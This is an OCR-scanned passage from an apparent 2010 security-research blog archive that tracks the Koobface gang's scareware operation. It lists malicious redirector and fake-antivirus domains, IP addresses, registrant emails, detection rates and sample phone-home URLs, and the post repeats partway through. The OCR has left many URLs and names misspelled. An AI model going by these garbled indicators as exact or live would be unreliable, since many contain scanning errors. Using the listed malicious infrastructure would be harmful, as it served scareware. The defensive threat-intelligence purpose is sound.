http://www.virustotal.com/analisis/3d6c89fl93b31c41c4083 

00ebe006fd79239a401bcb70fe907605bb2af8c6de4-12668 


50664 
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koobface-front.html 


39. http://ddanchev.blo as pot.com/2009/Q7/koobface-come- 
out-come-out-wherever-vou.html 

40. http://ddanchev.blo as pot.com/2009/Q7/dissectin a- 
koobface-worms-twitter.html 


41. http://ddanchev.blo as pot.com/2009/12/diverse-portfolio- 
of-fake-securitv.html 

42. http://ddanchev.blo as pot.com/2009/07/diverse-PortfoliQ- 
of-fake-securitv 27.html 

43. http://ddanchev.blo as pot.eom/2009/07/diverse-portfolio- 
of-fake-securitv.html 

44. http://ddanchev.blo as pot.eom/2009/06/diverse-portfolio- 
of-fake-securitv.html 
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45. http://ddanchev.blo as pot.com/2009/05/diverse-portfolio- 
of-fake-securitv.html 

46. http://ddanchev.blo as pot.com/2009/Q4/diverse-portfolio- 
of-fake-securitv 16.html 

47. http://ddanchev.blo as pot.eom/2009/04/diverse-portfolio- 
of-fake-securitv.html 






















































48. http://ddanchev.blo as pot.com/2009/Q3/diverse-portfolio- 
of-fake-securitv_31.html 

49. http://ddanchev.blo as pot.com/2009/Q3/diverse-portfolio- 
of-fake-securitv.html 

50. http://ddanchev.blo as pot.com/2009/02/diverse-portfolio- 
of-fake-securitv.html 

51. http://ddanchev.blo as pot.com/2009/01/diverse-portfolio- 
of-fake-securitv.html 

52. http://ddanchev.blo as pot.com/2008/ll/diverse-portfolio- 
of-fake-securitv_12.html 

53. http://ddanchev.blo as pot.com/2008/ll/diverse-portfolio- 
of-fake-securitv.html 

54. http://ddanchev.blo as pot.com/2008/10/diverse-PortfoliQ- 
of-fa ke-sec uri tv 28.html 

55. http://ddanchev.blo as pot.eom/2008/10/diverse-portfolio- 
of-f a ke-sec u rii tv_2 2.html 

56. http://ddanchev.blo as pot.com/20Q8/10/diverse-portfolio- 
of-fake-securitv_16.html 

57. http://ddanchev.blo as pot.com/20Q8/10/diverse-portfolio- 
of-fake-securitv.html 

58. http://ddanchev.blo as pot.com/2008/Q9/diverse-portfolio- 
of-fake-securitv 30.html 

59. http://ddanchev.blo as pot.com/2008/09/diverse-portfolio- 
of-fake-securitv_24.html 

60. http://ddanchev.blo as pot.com/2008/Q9/diverse-portfolio- 
of-fake-securitv.html 




































































61. http://ddanchev.blo as pot.com/2008/Q8/diverse-portfolio- 
of-fake-securitv_25.html 


62. http://ddanchev.blo as pot.com/2008/Q8/diverse-portfolio- 
of-fake-securitv_20.html 

63. http://ddanchev.blo as pot.com/2008/08/diverse-portfolio- 
of-fake-securitv.html 

64. http://ddanchev.blo as pot.com/2007/12/diverse-portfolio- 
of-fake-securitv.html 

65. http://ddanchev.blo as pot.com/ 

66. http://twitter.com/danchodanchev 
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A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

( 2010 - 02-04 00 : 50 ) 

With [l]scareware/rogueware/fake security software 
continuing to be the cash-cow choice for the Koobface gang, 

keeping them on a short leash in order to become the 
biggest [2]opportunity cost for the gang's business model is 
crucial. The following are currently active blackhat SEO 
redirectors/Koobface-infected hosts redirectors and actual 
scareware domains courtesy of the gang. 
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Blackhat SEO redirectors, also embedded at Koobface- 
infected hosts, with identical redirector ID (?pid=312s02 

&sid=4dbl2f): 

freeticketwin.com - 91.212.226.25 - Email: 
test@now.net.cn 

lotteryvideowin.com - Email: test@now.net.cn 

videohototplaypoker.com - Email: test@now.net.cn 

financetopsecrets.com - Email: test@now.net.cn 

how2winforex.com - 91.212.226.136 - Email: 
test@now.net.cn 

2money4money.com - Email: test@now.net.cn 

get-money-quickly.com - Email: test@now.net.cn 

fordusedsales .com - 193.104.106.250 - Email: 
test@now.net.cn 

buylexuscustoms .com - 91.212.226.185 - Email: 
test@now.net.cn 

tracegirlsonline .com - 89.248.168.22 - Email: 
test@now.net.cn 

skypetollfree .com - 96.44.128.245 - Email: 
test@now.net.cn 

dendy-trens .com - Email: test@now.net.cn 
pretendtolove .com - Email: test@now.net.cn 
bewareoffreebies .com - Email: test@now.net.cn 



harry-the-potter .com - Email: test@now.net.cn 

getlancomediscount .com - Email: 
baldwinnere@yahoo.co.uk 

vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 
Iady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletvmodeltoys .com - Email: 
CourtneyRWebb@aol.com 

volvomodeltoys .com - Email: CourtneyRWebb@aol.com 
manilawebcamera .com - Email: monkey22@live.com 
mumbaiwebcamera .com - Email: monkey22@live.com 
karachiwebcamera .com - Email: monkey22@live.com 


delhiwebcamera .com - Email: monkey22@live.com 

istanbulwebcamera .com - Email: monkey22@live.com 

lexusmodeltoys .com - Email: monkey22@live.com 

chevroletvmodeltoys .com - Email: 
CourtneyRWebb@aol.com 

bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 

Upon redirection, the scareware is served from malware-b- 
scan .com - 96.44.128.245; 91.212.226.97; 

91.212.226.185; 91.121.45.67, 91.212.226.203, 
94.228.209.195 - Email: mail@bristonnews.com. 
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Sample detection rate for newly introduced scareware 
samples: [3]Setup _312s2.exe - Result: 3/40 (7.5 %), 

[4]Setup _312s2.exe - Result: 4/39, [5]Setup 
_312s22.exe - Result: 2/39 (5.13 %), [6]Setup _312s2.exe 

- Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 

1/40 (2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), 
[9]Setup _312s2.exe - Result: 3/39 (7.7 %). [10]Setup 
_312s2.exe - Result: 4/40 (10 %), [ll]Setup _312s2.exe - 
Result: 1/40 (2.5 %), [12]Setup _312s2.exe - Result: 4/40 
(10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup _312s2.exe - Result: 5/41 (12.2 %), [15]Setup 
_312s2.exe - Result: 5/41 (12.2 %), [16]Setup _312s2.exe 

- Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 

4/41 (9.76 %), [18]Setup _312s2.exe - Result: 5/41 (12.2 

%), 

[19]Setup _312s2.exe - Result: 4/41 (9.76 %), [20]Setup 
_312s2.exe - Result: 3/41 (7.32 %), [21]Setup _312s2.exe 



- Result: 6/41 (14.63 %), [22]Setup _312s2.exe - Result: 
11/41 (26.83 %), [23]Setup _312s2.exe - Result: 4/42 
(9.53 %). 

Upon execution the sample phones back to winxp7server 
.com/download/winlogo.bmp - 94.228.208.57; rescuesy- 
supdate .com/?b=312s2 - 83.133.125.216. The most 
recent samples ( Wednesday, February 10, 2010 ) phone back 

to wintimeserver .com/?b=312s2 - 91.212.226.125 and 
firmwaredownloadserver .com/download/winlogo.bmp 

- 94.228.208.57. 

The most recent samples ( Sunday, February 21, 2010) 
phone back to firmwaredown- 

loadserver.com /download/winlogo.bmp - 

94.228.208.57; 

shifustserver.com /download/winlogo.bmp - 

94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 

The 

most 

recent 

samples 

( Friday, 

February 

12 , 

2010 ) 



phone 

back 

to 

firmwaredownloadserver 

.com/download/winlogo.bmp - 94.228.208.57; 
checklatestversion .com/?b=312s - 109.232.225.75. 

The most recent samples ( Wednesday, February 24, 2010) 
phone back to 

shifustserver.com/download/winlogo.bmp 

- 94.228.208.57 - Email: viinzer@hotmail.com and version- 
upgrade. com/?b=312sl2 - 89.248.168.21. Parked on the 
same IP are also checklatestversion.com and 
fastwinupdates.com. 
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Parked on the same IPs are more scareware domains part of 
the portfolio: 

interlantivirus.com - 87.98.130.232- Email: 
test@now.net.cn 

virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn 

bl9-virus-scanner.com - 87.98.130.232 - Email: 
test@now.net.cn 

intera-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 


interc-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interd-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

intere-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

inter-antivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

interlantivirus.com - 87.98.130.232 - Email: 
test@now.net.cn 

195.5.161.107/psxl/?vih = = RAND0M _STRINGS - no 
domain name 

91.212.132.241 /psxl/?vih = = RANDOM STRINGS 
195.5.161.105 /psxl/?vih = = RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn 
85 

zin-antivirus-scan .com - Email: test@now.net.cn 
nextgen-scannert .com - Email: test@now.net.cn 
protectionl5scan .com - Email: test@now.net.cn 
nitro-antispyware .com - Email: test@now.net.cn 
z2-antispyware .com - Email: test@now.net.cn 
spy-detectore .com - Email: admin@clossingt.com 
dis7-antivirus .com - Email: admin@vertigosmart.com 



v2comp-scanner .com - Email: admin@vertigosmart.com 

new-av-scannere .com - Email: missbarlingmail@aol.com 

smartvirus-scan6 .com - Email: info@terranova.com 

spywaremaxscan4 .com - Email: out@trialzoom.com 

super6antispyware .com - Email: mail@ordercom.com 

spyware-max-scan3 .com - Email: out@trialzoom.com 

max-antivirus-security5 .com - Email: 
mail@dynadoter.com 

winterdiscounts5 .com - Email: mail@haselbladtour.com 
11-antivirus .com - Email: call555call@live.com 
1-antivirus .com - Email: call555call@live.com 
lm-online-scanner .com - Email: stellar2@yahoo.com 
2m-online-scanner .com - Email: stellar2@yahoo.com 
2pro-antispyware .com - Email: mail@yahoo.com 
3pro-antispyware .com - Email: mail@yahoo.com 

6- antivirus .com - Email: call555call@live.com 

7- antivirus .com - Email: call555call@live.com 
9-antivirus .com - Email: call555call@live.com 
aO-online-scanner .com - Email: stellar2@yahoo.com 
a9-online-scanner .com - Email: stellar2@yahoo.com 



aa-antivirus .com - Email: call555call@live.com 
aa-online-scanner .com - Email: call555call@live.com 
ab-antivirus .com - Email: call555call@live.com 
ac-antivirus .com - Email: call555call@live.com 
ad-antivirus .com - Email: call555call@live.com 
advl-system-scanner .com - Email: JayRKibbe@live.com 
adv2-system-scanner .com - Email: JayRKibbe@live.com 
ae-antivirus .com - Email: call555call@live.com 
antivirus-expert-a .com - Email: 900ekony@live.com 
antivirus-expert-i .com - Email: 900ekony@live.com 
antivirus-expert-r .com - Email: 900ekony@live.com 
antivirus-expert-y .com - Email: 900ekony@live.com 
antivirussystemscanl .com - Email: 900ekony@live.com 
antivirussystemscana .com - Email: 900ekony@live.com 
army-antispywarea .com - Email: beliec99@yahoo.com 
army-antispywarei .com - Email: beliec99@yahoo.com 
army-antispywarel .com - Email: beliec99@yahoo.com 
army-antispywarep .com - Email: beliec99@yahoo.com 
army-antivirusa .com - Email: beliec99@yahoo.com 
army-antivirusd .com - Email: beliec99@yahoo.com 



army-antivirust .com - Email: beliec99@yahoo.com 
army-antivirusv .com - Email: beliec99@yahoo.com 
army-antivirusy .com - Email: beliec99@yahoo.com 
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bl-online-scanner .com - Email: stellar2@yahoo.com 

best-antiviruskO .com 

bestpd-virusscanner .com - Email: 
SusanCWagner@yahoo.com 

bestpr-virusscanner .com - Email: 
SusanCWagner@yahoo.com 

crystal-antimalware .com - Email: mail@vertigocats.com 

crystal-antivirus .com - Email: mail@vertigocats.com 

crystal-pro-scan .com - Email: mail@vertigocats.com 

crystal-pro-scanner .com - Email: mail@vertigocats.com 

crystal-spyscanner .com - Email: mail@vertigocats.com 

crystal-threatscanner .com - Email: 
mail@vertigocats.com 

crystal-virusscanner .com - Email: mail@vertigocats.com 
extra-spyware-defencea .com - Email: fabula8@live.com 
extra-spyware-defenceb .com - Email: fabula8@live.com 
malware-a-scan .com - Email: mail@bristonnews.com 



malware-b-scan .com - Email: mail@bristonnews.com 

malware-c-scan .com - Email: mail@bristonnews.com 

malware-d-scan .com - Email: mail@bristonnews.com 

malware-t-scan .com - Email: mail@bristonnews.com 

mega-antispywarea .com - Email: fabula8@live.com 

mega-antispywareb .com - Email: fabula8@live.com 

mm-online-scanner .com - Email: stellar2@yahoo.com 

my-computer-antivirusa .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusb .com - Email: 
dillinzerl@yahoo.com 

my-computer-antiviruse .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusq .com - Email: 
dillinzerl@yahoo.com 

my-computer-antivirusw .com - Email: 
dillinzerl@yahoo.com 

my-computer-scanc .com - Email: 
clintommail2@yahoo.com 

my-computer-scane .com - Email: 
clintommail2@yahoo.com 

my-computer-scanl .com - Email: 
clintommail2@yahoo.com 



my-computer-scannera .com - Email: 
cl intommail2@yahoo.com 

my-computer-scannerl .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerm .com - Email: 
clintommail2@yahoo.com 

my-computer-scannern .com - Email: 
clintommail2@yahoo.com 

my-computer-scannerv .com - Email: 
clintommail2@yahoo.com 

my-computer-scanw .com - Email: 
clintommail2@yahoo.com 

my-pc-online-scanm .com - Email: dillinzerl@yahoo.com 
my-pc-online-scann .com - Email: dillinzerl@yahoo.com 
my-pc-online-scanr .com - Email: dillinzerl@yahoo.com 
my-pc-online-scanv .com - Email: dillinzerl@yahoo.com 
nl-system-scanner .com - Email: JayRKibbe@live.com 
n2-system-scanner .com - Email: JayRKibbe@live.com 
nasa-antivirusl .com - Email: call555call@live.com 
nasa-antivirus3 .com - Email: call555call@live.com 
nasa-antivirusa .com - Email: call555call@live.com 
nasa-antivirusb .com - Email: call555call@live.com 
nasa-antiviruso .com - Email: call555call@live.com 




pcl-system-scanner .com - Email: JayRKibbe@live.com 
pc2-system-scanner .com - Email: JayRKibbe@live.com 
proO-antivirus .com - Email: mail@yahoo.com 
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proO-system-scanner .com - Email: JayRKibbe@live.com 

prol-system-scanner .com - Email: JayRKibbe@live.com 

pro2-antivirus .com - Email: mail@yahoo.com 

pro4-antivirus .com - Email: mail@yahoo.com 

pro6-antivirus .com - Email: mail@yahoo.com 

pro8-antivirus .com - Email: mail@yahoo.com 

remote-antispywarec .com - Email: 
teresa2mail.me@live.com 

remote-antispywared .com - Email: 
teresa2mail.me@live.com 

remote-antispywaree .com - Email: 
teresa2mail.me@live.com 

remote-antispywarey .com - Email: 
teresa2mail.me@live.com 

remote-pcl-scanner .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannera .com - Email: 
teresa2mail.me@live.com 


remote-pc-scannerr .com - Email: 
teresa2mail.me@live.com 


remote-pc-scannerv .com - Email: 
teresa2mail.me@live.com 

remote-pc-scannery .com - Email: 
teresa2mail.me@live.com 

scan3antispyware .com - Email: o@mozzilastuf.com 
scan6antispyware .com - Email: o@mozzilastuf.com 
scan8antispyware .com - Email: o@mozzilastuf.com 
scan-antispywarea .com - Email: o@mozzilastuf.com 
scan-antispywarec .com - Email: o@mozzilastuf.com 
scan-antispywared .com - Email: o@mozzilastuf.com 
scan-antispywarez .com - Email: o@mozzilastuf.com 
spyware-01-scanner .com - Email: mail@bristonnews.com 
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spyware-03-scanner .com - Email: mail@bristonnews.com 

spyware-05-scanner .com - Email: mail@bristonnews.com 

spyware-06-scanner .com - Email: mail@bristonnews.com 

spyware-07-scanner .com - Email: mail@bristonnews.com 

stcanning-your-computerc .com - Email: 
mitra66@yahoo.com 



stcanning-your-computerd .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerq .com - Email: 
mitra66@yahoo.com 

stcanning-your-computerr .com - Email: 
mitra66@yahoo.com 

stcanning-your-computert .com - Email: 
mitra66@yahoo.com 

stcanning-your-pca .com - Email: mitra66@yahoo.com 

stcanning-your-pcb .com - Email: mitra66@yahoo.com 

stcanning-your-pcc .com - Email: mitra66@yahoo.com 

stcanning-your-pcd .com - Email: mitra66@yahoo.com 

stcanning-your-pce .com - Email: mitra66@yahoo.com 

stealthvl-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv2-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv7-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv8-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

stealthv9-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

verl-system-scanner .com - Email: JayRKibbe@live.com 



ver2-system-scanner .com - Email: JayRKibbe@live.com 

virus-al-scanner .com - Email: mail@bristonnews.com 

virus-al-scanner .com - Email: mail@bristonnews.com 

virus-bl-scanner .com - Email: mail@bristonnews.com 

virus-bl-scanner .com - Email: mail@bristonnews.com 

virus-cl-scanner .com - Email: mail@bristonnews.com 

virus-cl-scanner .com - Email: mail@bristonnews.com 

virus-dl-scanner .com - Email: mail@bristonnews.com 

virus-dl-scanner .com - Email: mail@bristonnews.com 

virus-e2-scanner .com - Email: mail@bristonnews.com 

virus-e2-scanner .com - Email: mail@bristonnews.com 

windowsv5-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv6-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv7-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv8-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

windowsv9-antispyware .com - Email: 
SteveLCartwright@yahoo.com 

zO-online-scanner .com - Email: stellar2@yahoo.com 



zl-online-scanner .com - Email: stellar2@yahoo.com 
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Active scareware domains portfolio (blackhat SEO/Koobface 
pushed) parked at [24]212.150.164.190 - AS1680 - 

NV-ASN 013 NetVision Ltd : 

antispy-download .org - Email: 
robertsimonkroon@gmail.com 

scanner-virus-free .org - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .org - Email: robertsimonkroon@gmail.com 

tube-sex-porn .org - Email: robertsimonkroon@gmail.com 

download-free-files .org - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .org - Email: robertsimonkroon@gmail.com 

scan-your-pc-now .org - Email: michaeltycoon@gmail.com 

scanner-virus-free .com - Email: 
robertsimonkroon@gmail.com 

tube-sex-porn .com - Email: robertsimonkroon@gmail.com 

scanner-free-virus .com - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .com - Email: 
robertsimonkroon@gmail.com 


antispy-download .info - Email: 
robertsi monkroon@gmail.com 

soft-download-free .info - Email: 
robertsimonkroon@gmail.com 
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scanner-virus-free .info - Email: 
robertsimonkroon@gmail.com 

scanner-free-virus .info - Email: 
robertsimonkroon@gmail.com 

scan-your-pc-now .info - Email: 
michaeltycoon@gmail.com 

adult-tube-free .net - Email: michaeltycoon@gmail.com 

scanner-virus-free .net - Email: 
robertsimonkroon@gmail.com 

tube-sex-porn .net - Email: robertsimonkroon@gmail.com 

download-free-files .net - Email: 
michaeltycoon@gmail.com 

scanner-free-virus .net - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .net - Email: robertsimonkroon@gmail.com 

ekjsoft .eu - Email: robertsimonkroon@gmail.com 

antispy-download .biz - Email: 
robertsimonkroon@gmail.com 



soft-download-free .biz - Email: 
robertsi monkroon@gmail.com 

scanner-virus-free .biz - Email: 
robertsi monkroon@gmail.com 

free-malware-scan .biz - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .biz - Email: robertsimonkroon@gmail.com 

tube-sex-porn .biz - Email: robertsimonkroon@gmail.com 

download-free-files .biz - Email: 
michaeltycoon@gmail.com 
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scanner-free-virus .biz - Email: 
robertsimonkroon@gmail.com 

download-free-soft .biz - Email: 
robertsimonkroon@gmail.com 

tube-porn-best .biz - Email: robertsimonkroon@gmail.com 

scan-your-pc-now .biz - Email: michaeltycoon@gmail.com 

porn-tube-sex .biz - Email: robertsimonkroon@gmail.com 

alrzsoft .in - Email: petrenko.kolia@yandex.ru 

antispy-download .biz - Email: 
robertsimonkroon@gmail.com 

cool-tube-porn .net - Email: robertsimonkroon@gmail.com 


cool-tube-porn .org - Email: robertsimonkroon@gmail.com 


download-free-now .net - Email: 
robertsimonkroon@gmail.com 

download-free-now .org - Email: 
robertsimonkroon@gmail.com 

download-free-soft .com - Email: 
robertsimonkroon@gmail.com 

download-free-soft .net - Email: 
robertsimonkroon@gmail.com 

download-scaner-free .com - Email: 
robertsimonkroon@gmail.com 

ekjsoft .eu 
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fdglsoft .in - Email: petrenko.kolia@yandex.ru 

free-virus-scanner .net - Email: 
robertsimonkroon@gmail.com 

kleqsoft .in - Email: petrenko.kolia@yandex.ru 

kltysoft .in - Email: petrenko.kolia@yandex.ru 

ktyjsoft .in - Email: petrenko.kolia@yandex.ru 

kyezsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrjsoft .in - Email: petrenko.kolia@yandex.ru 

Ikrtsoft .in - Email: petrenko.kolia@yandex.ru 


mgtlsoft .in - Email: petrenko.kolia@yandex.ru 

porn-sex-tube .net - Email: robertsimonkroon@gmail.com 

porn-sex-tube .org - Email: robertsimonkroon@gmail.com 

scan-free-malware .net - Email: 
robertsimonkroon@gmail.com 

scan-free-malware .org - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .com - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .info - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .net - Email: 
robertsimonkroon@gmail.com 

spyware-scaner-free .org - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .biz - Email: robertsimonkroon@gmail.com 

tube-best-porn .com - Email: 
robertsimonkroon@gmail.com 

tube-best-porn .net - Email: robertsimonkroon@gmail.com 
tube-best-porn .org - Email: robertsimonkroon@gmail.com 
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tube-porn-sex .info - Email: robertsimonkroon@gmail.com 
tube-porn-sex .net - Email: robertsimonkroon@gmail.com 



tube-porn-sex .org - Email: robertsimonkroon@gmail.com 


What's so special about the 

robertsimonkroon@gmail.com email anyway? 

It's the fact that not only was 

[25]the email was once again used to register [26]scareware 
domains two times in July, 2009, but also, as pointed out in 
November 2009's "[27]Koobface Botnet's Scareware Business 
Model - Part Two", the same email was used to register the 
following download locations for scareware domains pushed 
by the Koobface botnet: 

0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com 
kt4lwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com 
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 
4go4i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 
kzvi4iiutrlle .cn - Email: robertsimonkroon@gmail.com 



hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 

mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 

mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 

fb7pxcqyb45oe .cn - Email: robertsimonkroon@gmail.com 

fyivbrl3b0dyf.cn - Email: robertsimonkroon@gmail.com 

z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com 

ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com 

p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 

gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 

fluqldfi3qkcm .cn - Email: robertsimonkroon@gmail.com 

7mxlz5jq0nt3o .cn - Email: robertsimonkroon@gmail.com 

3uxyctrlmiqeo .cn - Email: robertsimonkroon@gmail.com 

p0umob9k2g7mp .cn - Email: 
robertsimonkroon@gmail. com 

od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com 

bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 

7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com 

Stay tuned for a massive Koobface related activities 
update, analyzing the gang's multi-tasking 
throughout 

the entire January, 2010 - descriptive historical OSINT 
offers long-term value in cross-checking for 



connections. 


Related Koobface gang/botnet research: 

[28] How the Koobface Gang Monetizes Mac OS X Traffic 

[29] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[30] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[31] Koobface Botnet Starts Serving Client-Side Exploits 

[32] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[33] Koobface Botnet's Scareware Business Model - Part Two 

[34] Koobface Botnet's Scareware Business Model - Part One 
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[35] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[36] New Koobface campaign spoofs Adobe's Flash updater 

[37] Social engineering tactics of the Koobface botnet 

[38] Koobface Botnet Dissected in a TrendMicro Report 

[39] Movement on the Koobface Front - Part Two 

[40] Movement on the Koobface Front 

[41] Koobface - Come Out, Come Out, Wherever You Are 

[42] Dissecting Koobface Worm's Twitter Campaign 
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A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

(2010-02-04 00:50) 

With [l]scareware/rogueware/fake security software 
continuing to be the cash-cow choice for the Koobface gang, 













































keeping them on a short leash in order to become the 
biggest [2]opportunity cost for the gang's business model 
crucial. The following are currently active blackhat SEO 
redirectors/Koobface-infected hosts redirectors and actual 
scareware domains courtesy of the gang. 
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Blackhat SEO redirectors, also embedded at Koobface- 
infected hosts, with identical redirector ID (?pid=312s02 

&sid=4dbl2f): 

freeticketwin.com - 91.212.226.25 - Email: 
test@now.net.cn 

lotteryvideowin.com - Email: test@now.net.cn 

videohototplaypoker.com - Email: test@now.net.cn 

financetopsecrets.com - Email: test@now.net.cn 

how2winforex.com - 91.212.226.136 - Email: 
test@now.net.cn 

2money4money.com - Email: test@now.net.cn 

get-money-quickly.com - Email: test@now.net.cn 

fordusedsales .com - 193.104.106.250 - Email: 
test@now.net.cn 

buylexuscustoms .com - 91.212.226.185 - Email: 
test@now.net.cn 

tracegirlsonline .com - 89.248.168.22 - Email: 
test@now.net.cn 


skypetollfree .com - 96.44.128.245 - Email: 
test@now.net.cn 

dendy-trens .com - Email: test@now.net.cn 

pretendtolove .com - Email: test@now.net.cn 

bewareoffreebies .com - Email: test@now.net.cn 

harry-the-potter .com - Email: test@now.net.cn 

getlancomediscount .com - Email: 
baldwinnere@yahoo.co.uk 

vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 
Iady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletvmodeltoys .com - Email: 

Courtney RWebb@aol.com 

volvomodeltoys .com - Email: CourtneyRWebb@aol.com 

manilawebcamera .com - Email: monkey22@live.com 

mumbaiwebcamera .com - Email: monkey22@live.com 

karachiwebcamera .com - Email: monkey22@live.com 

delhiwebcamera .com - Email: monkey22@live.com 

istanbulwebcamera .com - Email: monkey22@live.com 

lexusmodeltoys .com - Email: monkey22@live.com 

chevroletvmodeltoys .com - Email: 
CourtneyRWebb@aol.com 

bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 

Upon redirection, the scareware is served from malware-b- 
scan .com - 96.44.128.245; 91.212.226.97; 
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91.212.226.185; 91.121.45.67, 91.212.226.203, 
94.228.209.195 - Email: mail@bristonnews.com. 

Sample detection rate for newly introduced scareware 
samples: [3]Setup _312s2.exe - Result: 3/40 (7.5 %), 

[4]Setup _312s2.exe - Result: 4/39, [5]Setup 
_312s22.exe - Result: 2/39 (5.13 %), [6]Setup _312s2.exe 
- Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 

1/40 (2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), 
[9]Setup _312s2.exe - Result: 3/39 (7.7 %). [10]Setup 



_312s2.exe - Result: 4/40 (10 %), [ll]Setup _312s2.exe - 
Result: 1/40 (2.5 %), [12]Setup _312s2.exe - Result: 4/40 
(10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup _312s2.exe - Result: 5/41 (12.2 %), [15]Setup 
_312s2.exe - Result: 5/41 (12.2 %), [16]Setup _312s2.exe 

- Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 

4/41 (9.76 %), [18]Setup _312s2.exe - Result: 5/41 (12.2 

%), 

[19]Setup _312s2.exe - Result: 4/41 (9.76 %), [20]Setup 
_312s2.exe - Result: 3/41 (7.32 %), [21]Setup _312s2.exe 

- Result: 6/41 (14.63 %), [22]Setup _312s2.exe - Result: 
11/41 (26.83 %), [23]Setup _312s2.exe - Result: 4/42 
(9.53 %). 

Upon execution the sample phones back to winxp7server 
.co m/down load/win logo, bmp - 94.228.208.57; rescuesy- 
supdate .com/?b=312s2 - 83.133.125.216. The most 
recent samples ( Wednesday, February 10, 2010 ) phone back 

to wintimeserver .com/?b=312s2 - 91.212.226.125 and 
firmwaredownloadserver .com/down load/win logo, bmp 

- 94.228.208.57. 

The most recent samples ( Sunday, February 21, 2010) 
phone back to firmwaredown- 

loadserver.com /download/winlogo.bmp - 

94.228.208.57; 

shifustserver.com /download/winlogo.bmp - 

94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 
The 


most 



recent 


samples 
( Friday , 

February 

12 , 

2010 ) 

phone 

back 

to 

firmwaredownloadserver 

.com/download/winlogo.bmp - 94.228.208.57; 
